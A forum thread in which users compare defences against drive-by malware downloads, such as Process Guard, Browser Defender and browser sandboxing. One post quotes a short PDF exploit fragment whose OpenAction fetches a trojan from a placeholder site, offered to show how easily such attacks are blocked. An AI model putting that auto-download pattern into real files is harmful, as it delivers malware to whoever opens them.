Anti-drive by software suggestion

Process guard help with drive by downloads?

 

Super Bowl stadium site hacked, seeded with exploits
http://blogs.zdnet.com/security/?p=15

Popular tennis websites struck in latest malware attack
http://www.sophos.com/pressoffice/news/articles/2008/06/infected-tennis-sites.html

Visitors to Sony PlayStation website at risk of malware infection
http://www.sophos.com/pressoffice/news/articles/2008/07/playstation.html

_____________________________________________________________________________​

"Drive-by Downloads" hasn't been explicitly defined in this thread. The classic definition is, downloading of malware executables by remote code execution. If this is the case, then the answer is Yes.

fcukdat who has tested such exploits for me says that nothing gets by Process Guard.

aigle (supreme malware tester par excellence) also tested a number of different products in a test I set up last year
using an IE exploit:

http://www.urs2.net/rsj/computing/tests/remote

Remember, that most drive-by downloads are targeted at IE {hint, hint}. Some exceptions are Flash and PDF exploits which can download malware, no matter the browser. A recent PDF exploit had this type of code:

Code:

....<< /Type /OpenAction
/S /URI
/URI (http://www.some_site.com/[B]some_trojan.exe[/B])

But this is no match for any of the products in the test. Easily blocked.

As mentioned by others, there are ways of preventing the exploit from getting to the point of downloading the malware - disabling scripting, for example.

But a solution such as those in the test are the barrier of last resort.

----
rich

 

Maybe I'm missing something. I don't understand how Antivirus 2008 could install and run at next boot on a machine that had a whitelist of allowed processes (when presumably Antivirus 2008 would not be on that whitelist). Perhaps you are talking about whitelisted websites, I'm not sure.

 

Yes, I mean web sites. I was talking in context of WOT, browser defender and other such applications that were suggested by some users.

 

Also, even without the NoScript add-on extension, Firefox has security settings to prevent drive-by add-on installs.

See how here

 

Browser Defender performs real-time analysis of site content AFAIK,unlike WOT and similar static site rating tools.

 

Don't forget, Online Armor Free includes Run Safer as part of Process Guard: http://tallemu.com/vbforum/comparisons.html. Practically seamless for a noob. I think just one check mark to turn it on...

 

http://www.browserdefender.com/

 

Well is the whole OA seamless for a noob? I wouldn't think so, or it depends on which kind of "noob" we're talking about...

 

Sounds interresting so tried it for a few hours, slowed browsing down quit a bit and didnt let me acces my webmail so off it went - i cant stand apps fukkin with my browsing on the otherhand WOT hasnt causes these issues but i passed on it for the reason u mentioned.

 

really? hmm my browsing speeds are still fast with browserdefender

 

No joke, could easily be a conflict from my end, maybe with Edge

 

So this is the easiest exploit protection?

 

Or chrome with its build in sandbox

 

Geswall. If you run a browser in isolation, no drive-by malware can install. The reason is no process can run outside the virtual environment unless you allow it to. And if it does get on the browser somehow, closing it kills the malware. Defensewall performs a similar function.

 

Does Browser Defender work with Opera?
If not, any similar freeware that works with Opera?

 

Just to add to Rmus list of so called common sites that were hacked, CNN News was exploited shortly after the College Playoffs when Atlanta was hit by a Tornado that night. I went to the CNN site to try to see what they had to report on and an exploit went beserk on my IE and forced a manual shutdown. Repeated attempts that evening yielded the same results so any widely popular server covered or not can be poked into and present a problem at any given time.

I had Process Guard & EQS out-of-service at the time and thats all it took.

It happens.